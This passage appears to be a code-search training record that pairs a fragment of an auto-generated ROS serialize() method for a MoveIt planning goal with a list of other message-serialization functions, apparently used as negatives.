buff.write(_get_struct_7d3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution)) length = len(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data) buff.write(_struct_I.pack(length)) pattern = '<%sb'%length buff.write(struct.pack(pattern, *self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data)) _x = self buff.write(_get_struct_3BidBid().pack(_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay)) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self))))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_2d2q14dq.pack(_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret))\n _x = self.msg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _send_serialized(self, socket, msg):\n socket.send(pickle.dumps(msg))", "def serialize_message(self) -> bytes:\n return self.compile_message().serialize()", "def serialize(self, buff):\n try:\n pass\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_struct_B.pack(self.result))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEd25519SignatureDepB._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self):\n messageLen = len(self._messageBuf) + 1 # 1 byte for the message type\n header = pack(self.headerFormat, messageLen)\n msgType = pack(self.messageTypeFormat, self.messageType)\n payload = bytes(self._messageBuf)\n return header + msgType + payload", "def serialize(self, buff):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self):\n\n # The len must be multiple of 4 bits to convert unambiguously\n\n id_len = self.id.bit_length()\n while (id_len % 4)!= 0:\n id_len += 1\n if self.payload:\n pay_len = self.payload.bit_length()\n while (pay_len % 4)!= 0:\n pay_len += 1\n else: pay_len = 0\n if self.command:\n com_len = self.command.bit_length()\n while (com_len % 4)!= 0:\n com_len += 1\n else: com_len = 0\n\n values = {\n \"id\": self.id,\n \"id_len\": id_len,\n \"payload\": self.payload,\n \"payload_len\": pay_len,\n \"command\": self.command,\n \"command_len\": com_len\n }\n\n\n if self.id == Message.MEASURE or self.id == Message.SINGLE_MEASURE:\n serial_format = (\n \"uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n else:\n serial_format = (\n \"0x23, uint:id_len=id, bits:payload_len=payload, bits:command_len = command, 0x0D0A\"\n )\n\n message = bitstring.pack(serial_format, **values)\n\n rospy.logdebug(\"Sent command '0x%s'\", message.hex)\n\n return message.tobytes()", "def write_message(message):\n\n return message.to_bytes()", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.robot_id.id))\n _x = self.robot_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs))\n _x = self.agv_msg.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.agv_msg.vehicle_id.id))\n _x = self.agv_msg.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage))\n _x = self.agv_msg.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.agv_msg.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.agv_msg.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.agv_msg.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.canmsg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_Bf2B2f2B2fBf().pack(_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaSignature._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n length = len(self.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.position))\n length = len(self.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.velocity))\n length = len(self.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.effort))\n length = len(self.position_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.position_command))\n length = len(self.velocity_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.velocity_command))\n length = len(self.effort_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.effort_command))\n length = len(self.accelerometer)\n buff.write(_struct_I.pack(length))\n for val1 in self.accelerometer:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.gyro)\n buff.write(_struct_I.pack(length))\n for val1 in self.gyro:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.orientation)\n buff.write(_struct_I.pack(length))\n for val1 in self.orientation:\n _x = val1\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.deflection)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.deflection))\n length = len(self.deflection_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.deflection_velocity))\n length = len(self.motor_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_velocity))\n length = len(self.motor_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_current))\n length = len(self.motor_winding_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_winding_current))\n length = len(self.motor_sensor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_sensor_temperature))\n length = len(self.motor_winding_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_winding_temperature))\n length = len(self.motor_housing_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_housing_temperature))\n length = len(self.board_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.board_temperature))\n length = len(self.processor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.processor_temperature))\n length = len(self.voltage)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.voltage))\n length = len(self.led_color)\n buff.write(_struct_I.pack(length))\n for val1 in self.led_color:\n _x = val1\n buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a))\n length = len(self.sequence_number)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.sequence_number))\n length = len(self.receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.receive_time))\n length = len(self.transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.transmit_time))\n length = len(self.hardware_receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.hardware_receive_time))\n length = len(self.hardware_transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(struct.pack(pattern, *self.hardware_transmit_time))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def pack(self,buffer):\n buffer.append(self.data)", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEd25519SignatureDepA._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2B2If().pack(_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage))\n buff.write(_get_struct_3f().pack(*self.pos_3d))\n buff.write(_get_struct_3f().pack(*self.eop_3d))\n buff.write(_get_struct_3f().pack(*self.vel_3d))\n buff.write(_get_struct_3f().pack(*self.angle_3d))\n buff.write(_get_struct_4f().pack(*self.quaternion))\n buff.write(_get_struct_3f().pack(*self.imu_gyro_3d))\n buff.write(_get_struct_3f().pack(*self.imu_acc_3d))\n length = len(self.nodes)\n buff.write(_struct_I.pack(length))\n for val1 in self.nodes:\n _x = val1\n buff.write(_get_struct_2B3f().pack(_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cmd\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cat\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaSignatureDepB._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_ihih3i3d2i2d().pack(_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgCertificateChain._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_12B.pack(_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_ih2B().pack(_x.rcvTOW, _x.week, _x.numSV, _x.reserved1))\n length = len(self.sv)\n buff.write(_struct_I.pack(length))\n for val1 in self.sv:\n _x = val1\n buff.write(_get_struct_2dfB2bB().pack(_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2ib6d12B().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.IdModulo, _x.InputVolA, _x.InputVolB, _x.InputCorrA, _x.InputCorrB, _x.OutputAnlg1, _x.OutputAnlg2, _x.InputDig1, _x.InputDig2, _x.InputDig3, _x.InputDig4, _x.OutputDig1, _x.OutputDig2, _x.OutputDig3, _x.OutputDig4, _x.OutputDig5, _x.OutputDig6, _x.OutputDig7, _x.OutputDig8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs))\n _x = self.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height))\n buff.write(_get_struct_3d().pack(*self.localStamp.position))\n buff.write(_get_struct_3d().pack(*self.localStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.localStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.localStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs))\n _x = self.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height))\n buff.write(_get_struct_3d().pack(*self.globalStamp.position))\n buff.write(_get_struct_3d().pack(*self.globalStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.globalStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.globalStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs))\n _x = self.camera.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs))\n _x = self.camera.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera.localStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs))\n _x = self.camera.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera.globalStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_id().pack(_x.camera.camera_numobstacles, _x.camera.VehSpeed))\n for val1 in self.camera_obj:\n _v1 = val1.header\n buff.write(_get_struct_I().pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.messageID))\n _v3 = val1.localStamp\n _v4 = _v3.header\n buff.write(_get_struct_I().pack(_v4.seq))\n _v5 = _v4.stamp\n _x = _v5\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v4.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v3\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_get_struct_3d().pack(*_v3.position))\n buff.write(_get_struct_3d().pack(*_v3.orientation))\n buff.write(_get_struct_3d().pack(*_v3.linearSpeed))\n buff.write(_get_struct_3d().pack(*_v3.angularSpeed))\n _v6 = val1.globalStamp\n _v7 = _v6.header\n buff.write(_get_struct_I().pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v6\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_get_struct_3d().pack(*_v6.position))\n buff.write(_get_struct_3d().pack(*_v6.orientation))\n buff.write(_get_struct_3d().pack(*_v6.linearSpeed))\n buff.write(_get_struct_3d().pack(*_v6.angularSpeed))\n _x = val1\n buff.write(_get_struct_i2d6i3d3i2d2ididid().pack(_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs))\n _x = self.camera_lane.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs))\n _x = self.camera_lane.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera_lane.localStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs))\n _x = self.camera_lane.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.position))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.orientation))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.linearSpeed))\n buff.write(_get_struct_3d().pack(*self.camera_lane.globalStamp.angularSpeed))\n _x = self\n buff.write(_get_struct_2i3did19i3did21i3did7i3did7i4di().pack(_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, 